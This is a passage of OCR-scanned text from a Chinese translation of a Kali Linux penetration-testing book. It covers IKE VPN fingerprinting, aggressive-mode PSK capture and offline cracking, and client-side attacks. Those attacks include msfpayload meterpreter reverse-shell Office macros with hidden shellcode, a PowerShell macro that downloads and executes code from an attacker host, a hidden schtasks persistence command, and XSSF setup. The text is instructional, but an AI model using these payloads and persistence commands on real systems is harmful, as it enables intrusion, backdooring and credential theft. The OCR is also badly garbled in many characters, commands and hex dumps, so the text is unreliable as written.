scan 的 命令 行 工 具 ， 使 用 IKE 协 议 来 友 现 和 识别 私有 网 络 。 它 还 支持 IKE 积 极 模 式 中 的 预 共享 密 钥 。 使 用 如 下 命令 ，ike-scan 可 
以 定位 目标 : 


rootGOkaliG:-i ike-scan -M «Target IP> 


前 面 命 令 的 执行 结果 如 图 10.20 所 示 。 
-M 交 换 机 返回 一 行 中 的 每 个 负载 ， 并 简化 输出 。 


ike-scan 工 具 对 目标 设备 进行 各 种 变换 的 测试 。 一 个 变换 包 合 以 下 属性 : 加 密 算法 (DES 和 3 DES) 、 散 列 算 法 (MD5 和 


SHA1) 、 身 份 验证 万 法 ( 预 共 享 密 钥 ) 、Diffie-Hellman 组 (选项 一 是 768 位 ， 选 项 二 是 1024 位 ) 和 生存 期 (2880085) , É 
将 确定 哪些 变换 引 友 了 成 功 的 响应 。 


root@kali:-# ike-scan -M 
starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/] 
Main Mode Handshake returned 
HDR=(CKY -R2165700fcbdaa976e50) 
SA=(Enc=3DES Hash-SHAl Group-2:modpl1024 Auth=PSK Lifelype=Seconds LifeDu 
ration=/8800 ) 
VID=4048b/d5bebce68575e/de/fTOGd6c7dscO00G000 (IKE Fragmentation) 


Ending ike-scan 1.9: 1 hosts scanned in 0.040 seconds (24.79 hosts/sec). 1 retu 
rned handshake; O returned notify 


图 10.20  i&ffike-scan-M 4 4- 


在 ike-scan 完 成 对 每 个 设备 的 确定 之 后 ， 程 序 将 返回 以 下 几 个 内 容 之 一 : 


:0 returned handshake (返回 握手 ) 0 returned notify (返回 通知 ) : 这 表明 目标 不 是 一 个 IPSec 网 关 。 


‘0 returned handshake; 1 returned notify: 这 表明 尽管 VPN 网 关 是 存在 的 ， 但 所 有 由 1ke-scan 提 供 的 变换 都 是 不 可 接受 的 。 


‘1 returned handshake; 0 returned notify: 正如 图 10.20 所 示 ， 这 表明 目标 配置 了 IPSec， 并 将 对 一 个 或 多 个 提供 给 它 的 变换 执行 
IKEDMH. 


10.4.2 ”指纹 识别 VPN 网 天 


如 果 你 能 与 VPN 网 关 建 立 握手 连接 ， 你 可 以 引导 识别 的 设备 产生 指纹 ， 返 回 以 下 信息 : 


供应 商 和 模型 
软件 版 本 


这 些 信息 用 于 识别 供应 商 特 定 的 攻击 ,或 者 用 于 调整 通用 的 攻击 。 


放生 如 果 vEN 由 一 个 防火 墙 控制 ， 那 么 指纹 识别 机 制 也 可 以 识别 出 该 防火 墙 。 
因为 IKE 并 不 能 保证 数据 包 传输 的 可 靠 性 ， 多 数 VPN 网 关 厂 商 使 用 专 有 协议 来 处 理 似乎 已 经 丢失 了 的 流量 。ike-scan 向 VPN 


网 天 友 送 IKE 探 测 包 ， 但 ike-scan 对 它 收 到 的 响应 信息 并 不 做 任何 回复 。 服 务 器 蜂 应 数据 包 丢 失 ， 并 实施 其 补 傍 策 上 略 重新 友 送 数 
据 包 。 通 过 分 析 数 据 包 和 重新 发 送 数据 包 的 数量 乙 间 的 时 间 差 异 ，ike-scan 扫 摘 工具 可 以 识别 供应 商 。 


如 图 10.21 所 示 的 例子 ，-M 选 项 单独 显示 行 有 效 载 何 ， 它 使 输出 更 容易 阅读 。ike-scan 扫 摘 工具 的 -showbackoff 选 项 (如 
图 10.21 所 示 ) ， 记 录 所 有 友 送 和 接收 数据 包 的 响应 时 间 ， 然 后 记录 显示 延迟 了 60 秒 的 结果 。 


在 图 10.21 中 ， 供 应 商 ID (Vendor ID, VID) 是 针对 特定 供应 商 和 用 于 识别 专 有 通信 或 具体 通信 细节 的 M D5 散 询 文 本 字符 
FR. 


Ike-scanidfi& LA tta REM EOS, WR, CRESS, AACS 
应 ， 直 到 一 个 有 效 的 1D 作 为 有 效 载 何 的 一 部 分 被 提供 。 


root@kali:~# ike-scan -M --showbackoff 173.231. 

starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 

173.231. Main Mode Handshake returned 
HDR-(CKY -R2122af600deae65465) 
SA=(Enc=3DES Hash=MD5 Group-2:modp1024 Auth=PSK Lifelype=Seconds LifeDuration-28800] 
VID24048b/d565ebceB88525e/de/fO00d6c2d3c08000080 (IKE Fragmentation) 


IKE Backoff Patterns: 


IP Address No. Recv time Delta Time 
173.231. l 1389247492 . 199793 8.800000 
173.231. 2 13892475660 .191380 7.991587 
173.231. 3 1389747508 .191003 7.999623 
173.231. ü 1389247516.193025 8.002022 


EFS «23k: Implementation guess: Cisco VPN Concentrator 
图 10.21 ”运行 ke-scan-M-showbackoff 
10.4.3 ”截获 预 共 享 密 钥 


ike-scan 工 具 可 以 用 来 推动 VPN 网 关 进 入 积极 模式 。 这 点 很 重要 ， 因 为 |PSec 的 积极 模式 不 保护 预 共 享 密 铀 。 身 份 验证 凭证 
作为 明文 被 发 送 ， 因 此 它 可 以 被 离线 工具 截获 和 破解 。 


在 下 面 的 例子 中 ， 使 用 以 下 命令 友 布 了 一 个 思科 VPN 集 中 器 : 


root@kali@:~# ike-scan --pskcrack --aggressive 
--id=peer <target> 


上 述 命令 的 执行 结果 ， 如 图 10.22 所 示 。 


root@kali:~# ike-scan --pskcrack --aggressive --id=peer 173.231 
starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-sca 
n/) 
173.231. Aggressive Mode Handshake returned HDR={CKY-R=b0085ae65e0ad6 
e9) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK Lifelype=Seconds LifeDur 
ation-28800) KeyExchange(128 bytes) Nonce(20 bytes) ID(Type-ID IPV4 ADDR, Va 
Lue=l/3.231. ) Hash(16 bytes) VID-12f5f28c45/168a9/02d9fe2/4cc0100 (Cis 
co Unity) VID=09002689dfd6b/12 (XAUTH) VIDzafcad/1368alflc96586596 c//5/0100 
(Dead Peer Detection v1.0) VID-4048b7d565ebce88525e7de7fO0d6c2d3cO0000000 (IKE 
Fragmentation) VID-1f0/f/0eaa6514d3b0fa965423500100 (Cisco VPN Concentrator 
) 


IKE PSK parameters (g xr:g xi:cky ricky i:sai b:idir b:ni b:nr b:hash r): 
2aeo26084/9d/b2abeb898a! | E ' | 


图 10.22  i&fjike-scan--pskcrack 


如 果 你 想 把 结果 封装 为 文本 文件 ， 用 于 附加 分 析 、 离 续 密 码 破解 ， 可 使 用 以 下 命令 : 


root@kali@:~# ike-scan --pskcrack --aggressive 
--id=peer <target> > <path/psk.txt> 


10.4.4 执行 离线 PSK 破 解 


在 使 用 离线 工具 破解 捕获 的 预 共享 密 钥 的 散 列 值 之 前 ,编辑 只 包含 散 列 值 ( 它 应 该 包 合 9 个 冒号 隔 开 的 值 ) 的 输出 文件 。 
psk-crack 是 最 有 效 的 破解 密码 的 工具 ， 他 支持 字典 攻击 、 蛮 力 攻 击 和 混合 方式 的 破解 。 
root@kali:-# psk-crack -d /usr/share/ike-scan/psk-crack-dictionary psk .txt 
Starting psk-crack [ike-scan 1.9] (http://www.nta-monitor.com/tools/ike-scan/) 
Running in dictionary cracking mode 


no match found for MDS hash a294//baSfbcaaab224bd06616c139b8b 
Ending psk-crack: 39495/ iterations in 0.918 seconds (430465.21 iterations/sec) 


图 10.23 3&4 7psk-crack 


像 所 有 离线 破解 练习 一 样 ， 成 束 是 对 工作 和 努力 的 测量 (时 间 、 计 算 工 作 量 和 投资 能 源 的 电力 系统 ) 。 一 个 强 的 预 共享 密 
钥 ， 比 如 在 图 10.23 中 所 显示 的 ， 去 破解 它 将 会 花费 很 长 时 间 。 


10.4.5 ”确定 默认 用 尸 账 户 


像 大 多 数 的 硬件 设备 一 样 ，VPN 网 天 通常 在 安 六 的 时 候 ， 包 含 默 认 用 尸 账 尸 。 这 些 账户 管理 员 无 权 更 改 。 使 用 指纹 识别 过 
程 中 收集 的 信息 ， 测 试 人 员 可 以 进行 网 络 搜索 来 确定 标准 的 用 户 账户。 


E a5 


如 果 测 试 人 员 能 够 访问 用 户 的 计算 机 ， 用 户 名 凭据 通 单 以 明文 形式 存储 在 系统 的 注册 表 中 。 此 外 ， 如 果 一 个 测试 人 员 能 够 访 
问 系 统 的 内 存 ， 他 可 以 直接 从 客 尸 端 系统 的 内 存 转 储 中 获取 密码 。 


yu VPN Cwww.rebootuser.com) 是 一 个 虚拟 的 操作 系统 ， 并 且 有 漏洞 的 VEN 服 务 器 。 它 可 以 让 你 应 用 本 章 中 描述 的 工具 ， 破 解 应 用 
程序 并 在 不 损害 系统 的 前 提 下 获得 root 访 问 权 限 。 


10.5 “小结 


在 这 一 章 中 ， 我 们 调查 研究 了 如 何 利用 常见 的 远程 访 间 应 用 程序 ， 包 括 那 些 使 用 密码 格外 附加 安全 的 应 用 。 我 们 利用 操作 系 
统 通信 协议 (RDP 和 SSH) 及 VNC 应 用 程序 。 同 时 也 学 会 了 如 何 对 安全 套 接 字 层 连接 、 虚 拟 专用 网 络 ， 以 及 降低 加 密 有 效 性 的 


攻击 类 型 进行 侦察 。 


在 下 一 草 中 ， 我 们 将 看 到 针对 特定 通信 信道 的 联合 攻击 结果 。 在 检查 客户 端 (漏洞 ) 利用 有 效 性 的 同时 ， 我 们 将 回顾 几 种 攻 
击 类 型 ， 如 浏览 器 开发 框架 (Browser Exploitation Framework, BeEF) mE. 


SE BP mB 
对 于 攻击 者 或 有 效 的 渗透 测试 者 来 说 ， 最 大 的 挑战 是 绕 过 一 个 目标 的 安全 控制 实现 入 侵 。 当 目标 系统 位 于 网 络 时 ， 这 可 能 是 
困难 的 ， 因 为 攻击 者 通常 需要 绕 过 防火 墙 、 代 理 服务 器 、 入 侵 检测 系统 和 一 个 深度 防护 体系 结构 的 其 他 元 素 . 


一 个 成 功 的 解决 策略 是 直接 把 客 尸 端 应 用 程序 作为 攻击 目标 。 用 尸 友 动 与 客户 端 应 用 程序 的 交互 ， 人 允许 攻击 者 利用 现 有 用 户 
和 应 用 程序 之 间 的 信任 优势 。 社 会 工程 学 方法 的 使 用 将 提高 客 尸 端 攻击 成 功 的 可 能 性 。 


客户 闯 攻 击 的 目标 系统 通 单 是 缺乏 安全 控制 妆 置 (尤其 是 防火 墙 和 入 侵 检 测 系 统 ) 的 企业 系统 。 如 果 这 些 攻击 是 成 功 的 ,并 


且 建 立 了 持久 稳定 的 通信 ， 那 么 客户 端 设 备 可 以 发 起 攻击 ， 一 旦 其 重新 连接 到 该 目标 网 络 上 。 


通过 本 章 学 习 ， 你 将 学 到 如 何 攻 击 客 尸 端 应 用 程序 ， 可 使 用 下 面 的 方法 CLA) : 


恶意 脚本 攻击 (VBScript 和 PowerShel1l) 
跨 站 点 脚本 框架 (Cross-Site Scripting Framework) 


:浏览 器 开发 框架 (Browser Exploitation Framework) 


11.1 使 用 恶意 脚本 攻击 系统 曝光 


客户 端 脚本 (如 JavaScript、VBScript、PowerShell) 被 开 友 成 移动 的 应 用 逻辑 程序 、 并 且 在 从 服务 器 到 客户 端的 计算 机 上 
操作 。 从 攻击 者 或 测试 者 的 角度 来 看 ， 使 用 这 些 脚 本 有 以 下 几 个 优点 : 


它们 已 经 是 目标 操作 环境 的 一 部 分 ; 攻击 者 不 需要 传输 大 型 编译 右 ， 或 其 他 辅助 文件 “如 加 密 软件 到 目标 系统 。 


-脚本 语言 设计 的 目的 是 便于 计算 机 操作 ， 如 配置 管理 和 系统 管理 等 。 例 如 ， 它 们 可 以 用 来 发 现 和 更 改 系统 配置 、 访 问 注册 表 、 执 行程 序 、 接 
入 网 络 服务 和 数据 库 、 并 通过 HTTP 或 电子 邮件 传输 三 进 制 文件 。 这 样 的 标准 脚本 操作 可 以 很 容易 地 为 测试 者 所 使 用 。 


-因为 它们 原 产 于 该 操作 系统 环境 ， 所 以 它们 通 癌 不 会 触发 防 病毒 警报 。 
捷 们 很 容易 被 使 用 ， 因 为 编写 该 脚本 仅 需 要 一 个 简单 的 文本 编辑 器 。 使 用 脚本 发 起 攻击 坚 无 障 但 。 


从 历史 上 看 ，JavaScript 是 用 来 友 动 攻击 的 首选 脚本 语言 ， 这 是 因为 JavaScript 广 泛 用 于 大 多 数目 标 系 统 。 由 于 JavaScript 
攻击 的 特 挟 已 经 众所周知 ， 我 们 将 重点 天 注 Kali 如 何 使 用 最 新 的 脚本 语言 : VBScript 和 PowerShell， 使 攻击 变 得 容易 。 


11.1.1 ”使 用 VBScript 进 行 攻击 曝光 


VBScript (Visual Basic Scripting Edition， 可 视 化 基本 编辑 脚本 ) 是 一 个 由 微软 开发 的 活动 脚本 语言 (Active Scripting 
language) 。 它 被 设计 成 一 个 轻 量 级 、 可 以 执行 小 程序 的 微软 本 地 语言 。 自 Windows 98 以 来 ，VBScript 束 被 默认 安 闪 在 
Microsoft Windows 友 布 的 每 一 个 昌 面 版 本 中 ， 这 使 它 成 为 客户 问 攻 击 的 首选 目标 。 


使 用 VBScript 发 起 攻击 ， 我 们 将 从 命令 行 中 调用 Metasploit 的 msfpayload: 


root@kali:~# msfpayload windows/meterpreter/reverse tcp 
LHOST-[Your local Host] LPORT= [Your Local Port] V 


注意 ，V 指 定 输出 为 一 个 VBs 安 脚本 。 输 出 将 显示 为 两 个 特定 部 分 的 文本 文件 ， 如 图 11.1 所 示 。 


rootükali:-4 msfpayload windows/meterpreter/reverse tcp LHOST=192.168.43.130 
LPORT24444 V 
"Created by msfpayload (http://www.metasploit.com). 
‘Payload: windows/meterpreter/reverse tcp 
Length: 290 
'Options: ["LHOST"z»"192.168.43.130", "| PORT"z»"4444"] 


i x oe ope ke ke oic olco oe oe oc fe oie oie ope oe oe oe ope oie oic oc oj fe oe oc oc ok ok oc oe oc oe oie ok oko ee oe ode ox e occ oic oe oke ok ok oc ok ox oe oke ope oe oxe ooo eoe o 
Po 

'* [his code is now split into two pieces: 

"* 1. Ine Macro. [his must be copied into the Office document 
M macro editor, This macro will run on startup. 


"* 2. The Data. Ihe hex dump at the end of this output must be 
bis appended to the end of the document contents. 


Vo okcogeokc ok oic oco oic oco ok oc oic oc oc oc oco oc kc oic oc oe oe oc oco o ooo ook oc oco ook oco oco oc ok o oco ok oc oic e oo oW 


图 11.1 调用 msfpayload 


要 使 用 该 脚本 ,打开 Microsoft Office 文 档 ， 并 创建 一 个 穴 (具体 命令 将 取决 于 Microsoft Windows 使 用 的 版 本 ) 。 从 下 面 
给 出 的 信息 框 中 ( 见 图 11.2) ， 复 制 文本 的 第 一 部 分 (从 Sub Auto Open () 到 最 后 的 End Sub) 到 宏 编 辑 器 ， 并 启用 宏 将 其 
保存 。 
ee ee i ee ee ee ee e à ok ko ke à o koc ee ey 
lok 
'* MACRO CODE 
!o* 


Lae KEE KEKE EEE EEE EEE EEE EE EERE EERE EERE EKER EEE EE KEKE EE KEKE EE KEKE EERE oko ko ko ko ko 


Sub Auto Open() 
Ffdqesmiz 
End Sub 


// Additional code removed for clarity 


Sub Workbook Open () 
Auto Open 
End Sub 


图 11.2” 宏 代码 的 信息 框 


接 下 来 ， 复 制 shellcode 到 实际 的 文档 中 。shellcode 部 分 摘录 如 图 11.3 所 示 。 


| 3k C DEC DHC OC ORC ORC OC DC DC OC OCC DC KC ac 2C OC 2C OC C OC OC OC OC KC MC OC KC 2C OC DR ORC ORC I DE DEC DKC IKC IKC Si DHC ORC COR ORC ORC ke ROC ORC ORC SC SIC OK DRC JC ORC MCÓK OE 
E: 
l ; 
* PAYLOAD DATA 
E 
| E E of ai oi E E E E aie cafe ac oc oc ope ok ke sie oi of E of oj ode oc oe fe fe oic oi E E E fe af E E E oke oke of E E oe oe E oe oe fe oo 


Bdlrcdogcz 
&HAD&HB5A&HOS0&HOOG&HO3&5HOOG&HOO&KHOGO&HO4&5HO9S&HOOG&HOOSHFF&HFF&HOOSHOO&HBS&HOO&HOO& 


HOO0&HOD&HODSHODSHOOSHAOBSHOOSHODSHOOSNHODSHOOSHOOSHOOSHODSHOOS&HOO&HODSHOONSHODSH 
G0&HOOSHOOSHOOGNRHOOSHOOSHOOSHOORHOOSHOORHODS&HODSHOORHOORHOOSHOONHOOSHOO &HOO&HO 
OSHOOSHOOSHESSHODSHOOSHOOSHOE&RH1F&HBASHBESHOOSHBA&HOSS&HCDSH21&HBS&HO 1 &HAC&HCD 
&H218H54&8H688H659&6H/3&H20&8H/0&8H7/2&8H6F&H67&H72&H61&H6D8H208H63&H61&H6ES&H6E&HSF& 
H/4&H20&8H62&8H65&H20&H72&H/5&H6E&H20&H6S&HGESH20&H44&HAF&H53&H20&HO6D&HGSF&H6 4&H 
65N8H2ENSHOD&HODSHOA&HZASHOOSHOOSHOOSHOOSHODNHODNHOONHS 38H3SSHFONHDOSHD / &H59&H3 | 


图 11.3 shellcode 部 分 摘录 


shellcode 被 看 作 一 个 可 用 于 执行 攻击 的 脚本 ， 所 以 你 可 能 希望 通过 最 小 化 字体 大 小 和 制作 颜色 匹配 文档 的 背景 等 方式 ,来 


隐藏 、 混 淆 shellcode。 


攻击 者 必须 在 Metasploit 上 设置 一 个 监听 器 。 在 命令 符 提 示 下 进入 msfconsole 后 ， 攻 击 者 通常 会 输入 以 下 命令 并 设置 主 
机 、 闯 口 和 有 效 载 倚 等 选项 ; 此 外 ， 攻 击 者 将 配置 连接 目 动 转移 到 更 稳定 的 explorer.exe 进 程 。 如 下 命令 行 所 示 : 
msf>use exploit/multi/handler 
msf»set lhost 192.168.43.130 
msf>set lport 4444 
msf>set payload windows/meterpreter/reverse tcp 


mef>set autorunscript migrate -n explorer.exe 
msf >exploit 


当 文 件 发 送 到 目标 ， 一 旦 其 打开 ， 目 标 即 会 弹出 安全 警告 ; 因此 ， 攻 击 者 将 使 用 社会 工程 学 迫使 预定 的 受害 者 选择 
Enable (启用 ) 选项 。 最 常见 的 方法 之 一 ， 就 是 在 已 配置 的 Microsoft Word 文 档 或 Excel 电 子 表格 中 众 入 宏 用 来 玩 这 个 游戏 。 


启动 该 文件 将 创建 一 个 相反 的 TCP 命 令 解 释 器 ， 并 返回 给 攻击 者 ， 人 允许 攻击 者 用 于 维持 和 目标 的 持久 稳定 连接 ， 并 执行 随后 
的 后 期 利用 活动 。 


为 了 扩展 这 种 攻击 方法 ， 我 们 可 以 使 用 位 于 /usr/share/metasploit-framework/tools 下 的 exe2vba.rb， 将 任何 可 执行 文件 
转换 成 VBScript。 


例如 ， 首 先 使 用 Metasploit 框 架 创 建 一 个 后 门 。 注 意 ，X 表 示 后 门 ， 将 作为 可 执行 文件 (attack.exe) 被 创建 ， 如 图 11.4 所 
不 。 


root@kali:~# msfpayload windows/meterpreter/reverse tcp LHOST=192.168.43.130 
LPORT=4444 X > /root/Desktop/attack.exe 
Created by msfpayload (http://www.metasploit.com). 
Payload: windows/meterpreter/reverse tcp 
Length: 290 
Options: {"LHOST"=>"192.168.43.130", "LPORT"2»"4444") 


图 11.4 4% Jf Metasploit él] 42 1] 


接 下 来 ， 使 用 以 下 命令 执行 exe2.vba， 把 可 执行 文件 转换 成 VBScript (确保 使 用 了 正确 的 路 径 ) : 


# ruby exe2vba.rb attack.exe attack.vbs 
[*] Converted 73802 bytes of EXE into a VBA script 


TCHS PUI MAE GRASS T ASC, PAESE. VBScript ATA Rays SS ACE ZEB 


表 ， 以 确保 命令 解释 器 保持 持久 稳定 性 。 我 们 友 现 这 种 类 型 的 攻击 是 绕 过 网 络 安全 控制 最 有 效 的 万 法 之 一 ， 并 可 用 于 维护 一 个 安 


全 的 网 络 连 接 。 


从 攻击 者 的 角度 来 看 ， 使 用 基于 VBScript 的 利用 (这 仍然 是 一 个 强大 的 工具 ) 有 一 些 显 车 的 优势 。 但 是 ， 它 正在 迅速 被 一 个 


更 强大 的 脚本 语言 PowerShell 所 取代 。 


11.1.2 使 用 Windows PowerShel| 攻 击 系 统 曝 光 


Windows PowerShell 是 一 个 用 于 系统 管理 的 命令 行 外 过 解释 器 及 脚本 语言 。 基 于 .NET 框 架 ， 它 扩展 了 VBScript 的 可 用 功 
BE。 该 语言 本 身 很 容易 扩展 ， 因 为 它 建 立 在 .NET 库 上 ， 你 可 以 从 C# 或 者 VB.NETi 语 言 中 合并 代码 。 你 也 可 以 利用 第 三 方 数据 库 。 
管 具有 扩展 性 ， 但 它 还 是 一 种 简洁 的 语言 。 仪 用 10 行 PowerShell 代 码 就 可 完成 超过 100 行 的 VBScript 代 码 所 实现 的 功能 |! 


NS 


也 许 ，Powershell 最 大 的 优点 是 ， 在 大 多 数 基 于 Windows 的 现代 操作 系统 (Windows 7 及 其 更 高 的 版 本 ) 上 默认 使 用 ， 且 


不 能 被 删除 。 


我 们 将 使 用 包括 Metasploit 框 架 的 PowerShell 脚 本 支持 攻击 阶段 的 杀 链 。 


为 了 发 起 攻击 ， 我 们 将 使 用 Metasploit 框 架 的 PowerShell Payload Web Delivery 模 块 。 该 模块 的 目的 是 为 了 在 目标 系统 上 


快速 建立 会 话 。 该 攻击 不 写 入 倍 盘 ， 因 此 不 可 能 触 友 客 尸 端 防 病毒 检测 。 友 起 攻击 和 可 用 模块 的 选项 如 图 11.5 所 示 。 


msf > use axploit/windows/misc/psh web delivery 
msf exploit(psh web delivery) > show options 


Module options (exploit/windows/misc/psh web delivery): 


Name Current Setting inti! nani — 

SRVHOST 6. 0.0.0 yes The locui host to listen on. This must 
be an address on the local machine or 0.0.0.0 

SRVPORT 8080 yes The Local port to Listen on. 

SSL false no Negotiate SSL for incoming connections 

SsLCert no Path to a custom SSL certificate (defa 
ult is randomly generated) 

SSLVersion  SSL3 no Specify the version of SSL that should 
be used (accepted: SSL2, SSL3, IL$S1) | 

URIPATH no The URI to use for this exploit (defau 


Lt is random) 


图 11.5 Metasploit 框 架 的 模块 选项 


Metasploit 框 架 将 生成 一 个 可 馈 入 文档 和 发 动 攻击 的 单行 安 ， 代 码 如 下 所 示 : 


Sub AutoOpen () 


Call Shell ("PowerShell.exe -w hidden -nop -ep bypass -c ""IEX 
((new-object 
net.webclient).downloadstring('http://192.168.1.102:4444/boom' 
) pur, 1) 


End Sub 


在 攻击 完成 之 前 ， 攻 击 者 必须 为 即将 传 入 的 shell 脚 本 准备 一 个 监听 器 (URIPATH 由 Metasploit 随 机 生成 ; 确保 已 为 监听 器 
设置 了 正确 的 URIPATH) 。 创 建 监听 器 的 命令 如 下 所 示 : 


msf> use exploit/windows/misc/psh web delivery 

msf exploit (psh web delivery) > set SRVHOST 192.168.1.102 
msf exploit(psh web delivery) > set URIPATH boom 

msf exploit (psh web delivery) > exploit 


一 个 成 功 的 攻击 将 在 攻击 者 的 系统 上 创建 一 个 交互 式 的 外 壳 脚 本 。 


"Hischtaskft4ibpsh web delivery 持 久 稳 定 是 可 能 的 。 以 下 命令 将 创建 一 个 预定 任务 ，MSOfficeMngmt， 其 登录 系统 后 将 执行 
Powershell .exe〔 默 认 情况 下 ， 位 于 Windows\system32 目 录 下 ) : 


schtasks /create /tn MSOfficeMngmt /tr "powershell.exe 
-WindowsStyle hidden -NoLogo -NonInteractive 
-ep -bypass -nop -c 'IEX ((new-object 
net.webclient) .downloadstring 
(''http://192.168.1.104:4444/boom'''))'" /sc onlogon 
/ru System 


其 他 的 PowerShell 脚 本 ， 旨 在 支持 后 期 利用 活动 的 脚本 ， 在 Kali 的 PowerSploit 目 录 中 可 以 找到 。 尽 管 PowerShell 有 很 好 的 
灵活 性 ， 但 仍 具 有 不 足 之 处 。 


例如 ， 如 果 包 含 安 的 文件 ， 被 最 终 用 户 在 一 个 持久 机 制 应 用 之 前 天 闭 ， 则 连接 丢失 。 


更 重要 的 是 ， 脚 本 VBscript 和 Powershell 只 在 微软 环境 中 有 用 。 为 了 扩展 客户 闯 的 攻击 光 围 ， 我 们 需要 寻找 一 个 可 以 被 利 
用 的 通用 客 尸 端 漏洞 ， 而 不 考虑 其 操作 系统 环境 。 这 种 漏洞 的 一 个 具体 实例 是 跨 站 后 脚本 。 


11.2 跨 业 后脚 本 框架 
跨 站 点 脚 本 (Cross-Site Scripting, XSS) 漏洞 ， 据 说 是 最 常见 的 、 能 在 网 站 上 找到 的 、 可 利用 的 漏洞 。 据 估计 ， 它 们 存在 
于 高 达 80% 的 所 有 应 用 程序 上 。 


XSS 汤 洞 友 生 在 应 用 程序 中 ， 通 常 是 基于 Web 的 ， 同 源 策 略 (same-origin policy) 违反 了 信任 的 概念 ， 并 且 显 示 由 用 户 提 
供 的 尚未 消毒 的 内 容 ， 用 以 删除 恶意 语句 。 


人 至少 有 两 个 主要 类 型 的 XSS 漏 洞 : 非 持 久 的 (non-persistent) 和 持久 的 (persistent) 。 


最 间 见 的 类 型 是 非 持 久 的 或 反映 漏洞 的 。 当 由 客户 听 提 供 的 数据 被 服 务 器 直接 使 用 并 显示 啊 应 时 ， 这 些 漏洞 将 会 产生 。 此 种 


漏洞 的 攻击 ， 可 以 通过 电子 邮件 ， 或 第 三 方 网 站 提供 一 个 似乎 值得 信赖 ， 但 包含 XSS 攻 击 代码 的 URL 而 友 生 。 如 果 可 信 站 点 很 容 
易 受 到 这 种 特定 的 攻击 ， 在 执行 环节 可 能 导致 受害 者 的 浏览 器 执行 恶意 脚本 ， 并 可 能 会 俘获 受害 者 。 


持久 的 (存储 ) XSS 漏 洞 将 出 现 ， 当 攻击 者 提供 的 数据 被 服务 器 保存 ， 然 后 在 他 们 浏览 网 页 的 过 程 中 ， 永 久 地 显示 在 其 信任 
的 网 页 中 。 这 通 剃 友 生 在 网 上 留言 板 和 博客 中 ， 这 里 允许 用 户 张 贴 HTML 格 式 的 消息 。 一 个 攻击 者 可 以 将 恶意 脚本 放 入 网 页 ， 其 
对 即将 到 来 的 用 户 是 不 可 见 的 ， 但 其 可 以 入 侵 受 影响 网 页 的 访客 。 


一 些 存在 于 Kali Linux 上 的 工具 可 以 找到 Xss 漏 洞 ， 包 括 xsser 和 各 种 各 样 的 漏洞 扫描 器 。 然 而 ， 也 有 一 些 工具 可 以 让 测试 者 
充分 利用 XSS 漏 洞 ， 并 展示 该 漏洞 的 严重 性 。 


跨 站 点 脚本 框架 (Cross-Site Scripting Framework, XSSF) 是 一 个 多 平台 的 安全 工具 ， 其 利用 XSs 漏 洞 在 目标 上 创建 通信 
通道 ， 并 支持 攻击 模块 ， 包 括 以 下 内 容 : 


对 目标 浏览 器 《指纹 和 以 前 访问 URL) 、 目 标 主机 《检测 虚拟 机 ， 获 取 系 统 信息 ， 注 册 密 铀 和 无 线 密 铀 ) 和 内 部 网 络 进行 侦 窒 。 
te ere ED 这 种 简单 的 * 攻 击 “ 可 用 来 展示 XSS 的 脆弱 性 ， 然 而 ， 更 复杂 的 警报 可 以 模拟 登录 提示 和 捕获 用 户 的 吴 份 认 


itg o 

‘Ma ok. fux HISHb. 

重 定向 目标 来 查看 不 同 的 网 页 。 一 个 恶意 的 网 页 可 以 自动 下 载 漏洞 ， 并 且 利 用 到 目标 系统 上 。 

-加 载 PDF 文 件 或 Java 小 程序 到 目标 系统 上 ， 或 者 锁 取 数据 ， 如 从 安 晶 移动 设备 中 穷 取 SD 卡 的 内 容 。 

:发 动 Metasploit 攻 击 ， 包 括 browser autopwn， 以 及 拒绝 服务 攻击 。 

发动 社会 工程 攻击 ， 其 中 包括 自动 完成 盗窃 、 点 击 劫持 Cclickjacking) 、 假 闪存 更 新 、 网 络 钓 鱼 和 标签 绑架 等 。 


此 外 ，XSSF 隧 道 (XSSF Tunnel) 功能 允许 攻击 者 冒充 受害 者 ,使 用 他 们 的 备 证 浏 响 网 站 与 会 话 。 这 可 能 是 一 种 有 效 的 、 
用 来 访问 企业 内 部 局 域 网 的 万 法 。 


该 APl 是 有 据 可 查 的 ， 可 以 很 容易 地 创建 新 的 攻击 模块 。 因 为 它 是 用 Ruby 编 写 的 ， 该 API 集 成 了 Metasploit 的 框架 ， 人 允许 攻 
击 者 友 动 更 多 的 攻击 。 


使 用 XSSF， 支 持 一 个 攻击 ， 必 须 进行 安装 和 配置 ， 具 体 步骤 如 下 : 
1.XSSF 并 不 是 来 自 于 Kali。 首 先 ， 用 户 必 须 打 开 一 个 终端 窗口 ， 并 设置 相应 的 目录 ， 使 用 下 面 的 命令 : 


root@kali:~# cd /opt/metasploit/apps/pro/msf3 
2. 可 使 用 以 下 命令 安 六 XSSF: 
svn export http://xssf.googlecode.com/svn/trunk ./ --force 


确保 你 使 用 svn export， 而 不 是 svn checkout， 因 为 后 一 个 命令 将 打破 现 有 的 MSF svn 文 件 。 成 功 安 疼 后 显示 如 图 11.6 所 


示 的 提示 。 


root@kali:/opt/metaspLoit/apps/pro/msf3# svn export http://xssf.googlecode.com/s 
vn/trunk ./ --force 

4 

README XSSF 

plugins 

plugins/xssf.rb 

lib 

lib/xssf 

lib/xssf/webric«patches.rb 

lib/xssf/xssfmaster.rb 

lib/xssf/xssfdatabase.rb 

lib/xssf/xssfgui.rb 

lib/xssf/xssfbanner.rb 

lib/xssf/xssftunmnsel.rb 

lib/xssf/xssfserver.rb 

modules 


图 11.6 成 功 安 装 XSSF 框 架 


3. 使 用 load xssf 命 令 从 Metasploit 框 架 控 制 从， 加载 XSSF 插 件 ， 如 图 11.7 所 示 。 


msf > load xssf 
[-] Your Ruby version is 1.9.3. Make sure your version is up-to-date with the la 
st non-vulnerable version before using XSSF! 


¥ / / =f / / / f / / Cross-Site Scripting Framework 3.0 
Ludovic Courgnaud - CONIX Security 


Please use command 'xssf urls' to see useful XSSF URLs 
[*] Successfully loaded plugin: xssf 


E11.7 “加载 XSSF 播 件 


4. 通 过 输入 helpxssf 命 令 ， 确 定 XSSF 已 经 装载 ， 如 图 11.8 所 示 。 


xssf Commands 


xssf activa victims 
xssf add auto attack 
victim s connection) 
xssf auto attacks 
xssf banner 
xssf clean victims 
xssf exploit 
n victim 
xssf information 
xssf log 
xssf logs 
xssf remove auto attack 
xssf remove victims 
xssf restore state 
ile 
xSSf save state 


xssf servers 
